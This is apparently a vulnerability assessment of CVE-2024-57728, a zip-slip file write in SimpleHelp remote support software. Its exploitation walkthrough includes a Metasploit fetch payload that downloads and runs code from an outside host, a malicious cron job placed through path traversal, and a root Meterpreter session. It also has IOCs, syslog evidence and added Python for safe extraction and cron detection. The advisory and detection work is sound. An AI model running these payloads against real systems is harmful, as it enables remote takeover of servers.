Attacker Value: Very High (1 user assessed)
Exploitability: High (1 user assessed)
User Interaction: None
Privileges Required: High
Attack Vector: Network

CVE-2024-57728

Disclosure Date: January 15, 2025

Description

SimpleHelp remote support software v5.5.7 and before allows admin users to upload arbitrary files anywhere on the file system by uploading a crafted zip file (i.e. zip slip). This can be exploited to execute arbitrary code on the host in the context of the SimpleHelp server user.

Technical Analysis

Overview

Between January 8th and 13th 2025, SimpleHelp RMM released patches for a set of vulnerabilities including an authenticated file upload affecting the following versions:

  • 5.5.x prior to 5.5.8 (patched January 8th)
  • 5.4.x prior to 5.4.10 (patched January 8th)
  • 5.3.x prior to 5.3.9 (patched January 13th)

This authenticated file upload vulnerability can be chained with CVE-2024-57727, an unauthenticated path traversal, resulting in unauthenticated remote code execution (RCE) in the affected versions. On January 22, 2025 Arctic Wolf began observing a campaign involving unauthorized access to devices running SimpleHelp RMM software as an initial access vector. Note that although this campaign has been recognized and CVE-2024-57727 has been added to the CISA KEV list, CVE-2024-57728 has not yet been added.

The exploitability has been rated High because, although it is trivial to exploit with credentials, authentication uses a custom protocol which complicates automating exploitation. The attacker value has been rated Very High because, when chained with CVE-2024-57727, it can provide privileged unauthenticated remote code execution (RCE).

Analysis

SimpleHelp hosts a Previous Release page where Build 5.5.7 and Build 5.5.8 can both be downloaded. Downloading the Linux 64-bit tar file gives a file named SimpleHelp-linux-amd64-5.5.8.tar.gz. Extracting it yields the following directory structure:

msfuser@msfuser-virtual-machine:~/testing_simple_help/SimpleHelp$ ls -l 
total 56
drwxrwxr-x  2 msfuser msfuser 4096 Jul 23  2024 admin
drwxrwxr-x  5 msfuser msfuser 4096 Jul 23  2024 configuration
-rwxr-xr-x  1 msfuser msfuser 4132 Jul 23  2024 console.sh
drwxrwxr-x 14 msfuser msfuser 4096 Oct 16 14:32 DEPLOY
drwxrwxr-x  5 msfuser msfuser 4096 Oct 16 14:32 images
drwxrwxr-x  6 msfuser msfuser 4096 Jul 30  2024 jre
drwxrwxr-x  5 msfuser msfuser 4096 Feb 20 09:09 lib
-rwxr-xr-x  1 msfuser msfuser 4132 Jul 23  2024 serverstart.sh
-rwxr-xr-x  1 msfuser msfuser 4132 Jul 23  2024 serverstop.sh
-rw-rw-r--  1 msfuser msfuser 6212 Oct 16 14:31 USAGE_TERMS.txt

SimpleHelp is a Java application packaged inside lib/shelp-jar-with-dependencies.jar. We can decompile the jar and save the source files. Once we have the source for both the patched and unpatched versions, diff the two using your preferred diffing tool:

msfuser@msfuser-virtual-machine:~/testing_simple_help$ meld 5_5_7/ 5_5_8/

Navigating through the patch we can see that the extractZip function in the ZipUtils class was vulnerable to zip slip prior to the patch in 5.5.8. Previously extractZip did not verify the destination path of each entry before writing the entry's contents, so entry names containing ../ were accepted, allowing an arbitrary file write.
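
The missing check described above, as an added example that is not code from SimpleHelp or from this assessment: a Python (rather than the application's Java) extraction routine that resolves each entry against the destination and refuses any that escape it, run against a constructed in-memory archive shaped like the edited backup used later in this analysis.

```python
import io
import tempfile
import zipfile
from pathlib import Path

# Constructed archive mirroring the edited backup described in this analysis: one
# legitimate configuration entry plus a zip-slip entry whose name escapes the restore dir.
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:
    _zf.writestr("configuration/shlicense.txt", "license placeholder\n")
    _zf.writestr("../../../../../../etc/cron.d/evilcronjob", "placeholder cron line\n")
MALICIOUS_ZIP = _buf.getvalue()

def resolve_inside(dest, entry_name):
    """Return the normalised target for entry_name if it stays under dest, else None.
    This is the check the unpatched extractZip lacked: join, normalise, then require the
    result to remain below the destination root; '..' segments and absolute names both fail."""
    root = Path(dest).resolve()
    target = (root / entry_name).resolve()
    try:
        target.relative_to(root)
    except ValueError:
        return None
    return target

def extract_zip_safely(zip_bytes, dest):
    """Write only entries that resolve inside dest; return (extracted, rejected) names."""
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = resolve_inside(dest, info.filename)
            if target is None:  # would land outside dest: record it, never write it
                rejected.append(info.filename)
                continue
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
            else:
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_bytes(zf.read(info))
            extracted.append(info.filename)
    return extracted, rejected

def demo(zip_bytes=MALICIOUS_ZIP):
    """Extract into a fresh temporary directory and report what was written or refused."""
    dest = Path(tempfile.mkdtemp(prefix="restore_"))
    extracted, rejected = extract_zip_safely(zip_bytes, dest)
    return {"extracted": extracted, "rejected": rejected,
            "license_written": (dest / "configuration" / "shlicense.txt").is_file(),
            "absolute_name_rejected": resolve_inside(dest, "/etc/cron.d/evilcronjob") is None}
```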

Finding out how to trigger this from an authenticated context is trivial, as the extractZip function is only called from one place in the entire application, the ProxyServerUpgrader class:

Tracing further backward through the source code (or by taking an educated guess based on the contents of the screenshot above) we find that the restartSelf function of the ProxyServerUpgrader class is called when a SimpleHelp Administrator chooses Restore From Backup inside the Configuration Backup settings of the Administration Panel:

To exploit this vulnerability we authenticate to the application using credentials obtained by exploiting CVE-2024-57727. In the Configuration Backup settings we choose Create Backup Now, so that we have a valid backup file to modify when we exploit the zip slip. The file will save as simplehelp_backup_250219_123329.zip. Unzip the file:

msfuser@msfuser-virtual-machine:~/testing_simple_help$ unzip simplehelp_backup_250219_123329.zip 
Archive:  simplehelp_backup_250219_123329.zip
  inflating: configuration/toolbox/toolboxdb  
  inflating: configuration/shlicense.txt  
  ...

Generate a fetch payload command using msfconsole:

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
curl -so /tmp/LCJSmTNSPfVM http://172.16.199.130:5453/7IH_n64ep-e10j3LFxxxxg;chmod +x /tmp/LCJSmTNSPfVM;/tmp/LCJSmTNSPfVM&

Create a payload file which we will upload as a cronjob:

msfuser@msfuser-virtual-machine:~/testing_simple_help$ echo "* * * * * root /bin/bash -c 'curl -so /tmp/LCJSmTNSPfVM http://172.16.199.130:5453/7IH_n64ep-e10j3LFxxxxg;chmod +x /tmp/LCJSmTNSPfVM;/tmp/LCJSmTNSPfVM&'" > evilcronjob

Move the payload file so that the path ../../../../../../etc/cron.d/evilcronjob is valid and contains the payload we just created, then rezip the SimpleHelp configuration and the cronjob together. Note that the depth of the path traversal may differ depending on where SimpleHelp is installed:

msfuser@msfuser-virtual-machine:~/testing_simple_help$ zip -r simplehelp_backup_edited.zip configuration/ ../../../../../../etc/cron.d/evilcronjob
  adding: configuration/ (stored 0%)
  ...
  adding: ../../../../../../etc/cron.d/evilcronjob (deflated 21%)

With the Metasploit payload handler started, upload the simplehelp_backup_edited.zip file via the Restore From Backup button in the UI, as shown in the screenshot above. Then, simply wait for the cronjob to run and a Meterpreter session to be established:

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 2
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 172.16.199.130:4445 
[*] Sending stage (3045380 bytes) to 172.16.199.130
[*] Meterpreter session 2 opened (172.16.199.130:4445 -> 172.16.199.130:52282) at 2025-02-19 17:04:01 -0800
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.130
OS           : Ubuntu 22.04 (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

IOCs

By default the Server Log records ProxyServer requests to restore configuration from backup. The log should be accessed from the SimpleHelp Technician Console, as it is encrypted and cannot be read directly from disk. Any unauthorized attempts to restore configuration from backup likely indicate that you have been compromised:

20/02 09:50:21.543: M649-20 17:50:21.542 (+22489) [FS] Delete configuration/restoredconfig.zip
20/02 09:50:21.573: M649-20 17:50:21.573 (+   31) [ProxyServer] Restart of server requested by SimpleHelpAdmin - SimpleHelpAdmin [SimpleHelpAdminGroup]
20/02 09:50:21.573: M649-20 17:50:21.573 (+    0) [ProxyServer] Apply config? true
20/02 09:50:21.573: M649-20 17:50:21.573 (+    0) [ProxyServer] User is admin, server will restart now
20/02 09:50:21.573: M649-20 17:50:21.573 (+    0) [ProxyServer] New config is to be applied, deleting any temporary restoration files
20/02 09:50:21.574: M649-20 17:50:21.574 (+    1) [ProxyServer] Renaming uploaded config ready for hashing
20/02 09:50:21.574: M649-20 17:50:21.574 (+    0) [ProxyServer] Hashing uploaded config
20/02 09:50:21.578: M649-20 17:50:21.578 (+    4) [ProxyServer] Config hash matches, extracting now
20/02 09:50:21.589: M649-20 17:50:21.589 (+   11) [ProxyServer] Preparing to fork and restore
20/02 09:50:21.592: M649-20 17:50:21.590 (+    1) [ProxyServerUpgrader] PID is 2536
20/02 09:50:21.593: M649-20 17:50:21.590 (+    0) [ProxyServerUpgrader] Checking for systemd parent service...

As shown in the analysis above, the easiest way to gain RCE from this file upload on SimpleHelp instances running on Unix systems is to upload a cron job. Check for unauthorized cronjobs in /etc/cron.d/ or grep for suspicious cronjob logging (note the Metasploit fetch payload being run):

msfuser@msfuser-virtual-machine:~/technician_console$ grep CRON /var/log/syslog | tail -100
Feb 19 16:30:01 msfuser-virtual-machine CRON[703449]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi)
Feb 19 16:53:01 msfuser-virtual-machine CRON[706963]: (root) CMD (/bin/bash -c 'curl -so /tmp/YyZQMouNKe http://172.16.199.130:8080/suioN8mRyX9yGnG44toCUw;chmod +x /tmp/YyZQMouNKe;/tmp/YyZQMouNKe&')
Feb 19 16:53:01 msfuser-virtual-machine CRON[706962]: (CRON) info (No MTA installed, discarding output)
Feb 19 17:04:01 msfuser-virtual-machine CRON[708644]: (root) CMD (/bin/bash -c 'curl -so /tmp/YyZQMouNKe http://172.16.199.130:8080/suioN8mRyX9yGnG44toCUw;chmod +x /tmp/YyZQMouNKe;/tmp/YyZQMouNKe&')
Feb 19 17:05:01 msfuser-virtual-machine CRON[708686]: (root) CMD (/bin/bash -c 'curl -so /tmp/YyZQMouNKe http://172.16.199.130:8080/suioN8mRyX9yGnG44toCUw;chmod +x /tmp/YyZQMouNKe;/tmp/YyZQMouNKe&')
Feb 19 17:10:01 msfuser-virtual-machine CRON[709431]: (root) CMD (/bin/bash -c 'curl -so /tmp/YyZQMouNKe http://172.16.199.130:8080/suioN8mRyX9yGnG44toCUw;chmod +x /tmp/YyZQMouNKe;/tmp/YyZQMouNKe&')
Feb 19 17:17:01 msfuser-virtual-machine CRON[710142]: (root) CMD (   cd / && run-parts --report /etc/cron.hourly)
Feb 19 17:30:01 msfuser-virtual-machine CRON[711403]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi)
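
Detection logic for the syslog pattern above, as an added example that is not part of the original assessment: Python that parses CRON CMD records from a constructed syslog excerpt (hostname, file names, URL and IP are placeholders) and flags commands that download into a scratch directory and mark the result executable, the shape of the Metasploit fetch payload shown.

```python
import re

# Constructed syslog excerpt in the same format as the grep output above; the host,
# file names, URL and IP are placeholders, not values from a real incident.
SAMPLE_SYSLOG = """\
Feb 19 16:30:01 host CRON[703449]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi)
Feb 19 16:53:01 host CRON[706963]: (root) CMD (/bin/bash -c 'curl -so /tmp/PLACEHOLDER http://192.0.2.10:8080/PLACEHOLDER;chmod +x /tmp/PLACEHOLDER;/tmp/PLACEHOLDER&')
Feb 19 16:53:01 host CRON[706962]: (CRON) info (No MTA installed, discarding output)
Feb 19 17:05:01 host CRON[708686]: (root) CMD (/bin/bash -c 'wget -qO /dev/shm/PLACEHOLDER http://192.0.2.10:8080/PLACEHOLDER;chmod 755 /dev/shm/PLACEHOLDER;/dev/shm/PLACEHOLDER&')
Feb 19 17:17:01 host CRON[710142]: (root) CMD (   cd / && run-parts --report /etc/cron.hourly)
"""

# One syslog CRON "CMD" record: timestamp, host, pid, user and the command text.
CRON_CMD = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"CRON\[(?P<pid>\d+)\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$"
)

# Traits of a download-then-execute ("fetch") cron command: a downloader, a write into a
# world-writable scratch directory, and the dropped file being made executable.
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
SCRATCH_DIR = re.compile(r"/(?:tmp|var/tmp|dev/shm)/")
MAKE_EXEC = re.compile(r"\bchmod\s+(?:\+x|[0-7]?7[0-7]{2})\b")

def is_fetch_payload(cmd):
    """True when a cron command shows all three fetch-payload traits at once."""
    return all(p.search(cmd) for p in (DOWNLOADER, SCRATCH_DIR, MAKE_EXEC))

def find_suspicious_cron(syslog_text):
    """Return the CRON CMD records in syslog_text whose command looks like a fetch payload."""
    hits = []
    for line in syslog_text.splitlines():
        m = CRON_CMD.match(line)
        if m and is_fetch_payload(m["cmd"]):
            hits.append({"ts": m["ts"], "pid": m["pid"], "user": m["user"], "cmd": m["cmd"]})
    return hits
```

Benign entries such as the anacron and run-parts lines are parsed but not flagged, and the "(CRON) info" line is not a CMD record at all.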

Note that because this RCE can give privileged access, an adversary could attempt to cover their tracks entirely, depending on their desired opsec.

References

https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/

CVSS V3 Severity and Metrics

Base Score: 7.2 High
Impact Score: 5.9
Exploitability Score: 1.2
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): High
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
